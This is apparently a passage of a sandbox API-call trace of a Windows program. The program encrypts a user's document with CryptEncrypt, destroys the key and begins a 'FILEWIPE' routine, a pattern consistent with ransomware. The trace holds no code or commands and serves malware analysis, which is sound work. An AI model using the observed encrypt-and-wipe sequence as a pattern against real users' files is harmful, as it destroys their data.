hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0180.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0180.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0180.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0180.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0180.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0180.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0180.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0180.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0180.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0180.010] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.010] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.010] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.010] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.010] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.010] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.010] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0180.010] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.010] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.010] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0180.011] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.011] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.011] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0180.011] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0180.011] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0180.011] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.011] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.011] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.011] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.011] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.011] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.011] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0180.011] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.011] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x4505, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x4510) returned 1 [0180.011] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.011] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.011] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.012] CharLowerBuffW (in: lpsz="byte[17681]", cchLength=0xb | out: lpsz="byte[17681]") returned 0xb [0180.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.012] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.012] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0180.012] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.012] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbf2a38*, pdwDataLen=0x87e820*=0x4505, dwBufLen=0x4510 | out: pbData=0xbf2a38*, pdwDataLen=0x87e820*=0x4510) returned 1 [0180.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.012] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0180.012] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.012] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0180.012] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0180.012] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0180.013] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.013] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.013] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0180.013] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.013] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.013] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.013] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.013] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.013] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.016] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.016] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.016] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0180.016] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0180.016] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.016] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0180.016] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.016] CryptDestroyKey (hKey=0x90aed8) returned 1 [0180.016] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0180.016] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0180.016] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0180.016] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0180.016] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0180.016] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0180.016] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0180.016] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0180.017] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.017] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0180.017] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0180.017] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0180.017] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0180.017] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0180.017] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.017] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0180.017] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.017] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0180.017] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0180.017] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0180.017] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.017] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.017] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0180.017] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.017] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.017] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0180.017] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0180.017] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0180.017] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.017] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0180.017] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.032] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.032] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0180.032] FreeLibrary (hLibModule=0x74f20000) returned 1 [0180.032] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.032] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.033] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.034] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.035] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.036] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.036] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0180.036] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.036] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.037] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3772ae0, ftCreationTime.dwHighDateTime=0x1d5e5f4, ftLastAccessTime.dwLowDateTime=0xf1b1dd60, ftLastAccessTime.dwHighDateTime=0x1d5d959, ftLastWriteTime.dwLowDateTime=0xf1b1dd60, ftLastWriteTime.dwHighDateTime=0x1d5d959, nFileSizeHigh=0x0, nFileSizeLow=0x4505, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="_--jWXD.odt", cAlternateFileName="")) returned 0x90ae18 [0180.037] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0180.037] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.037] CharLowerBuffW (in: lpsz="byte[17669]", cchLength=0xb | out: lpsz="byte[17669]") returned 0xb [0180.037] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.037] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0180.037] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.037] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0180.037] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0180.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0180.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0180.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0180.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2768 [0180.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2768, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0180.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0180.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0180.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0180.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0180.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0180.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0180.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0180.038] FreeLibrary (hLibModule=0x75c90000) returned 1 [0180.038] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0180.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0180.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0180.038] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0180.038] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0180.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0180.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0180.038] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0180.038] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0180.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0180.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0180.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0180.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0180.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0180.039] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0180.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0180.039] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0180.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0180.039] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0180.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0180.039] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 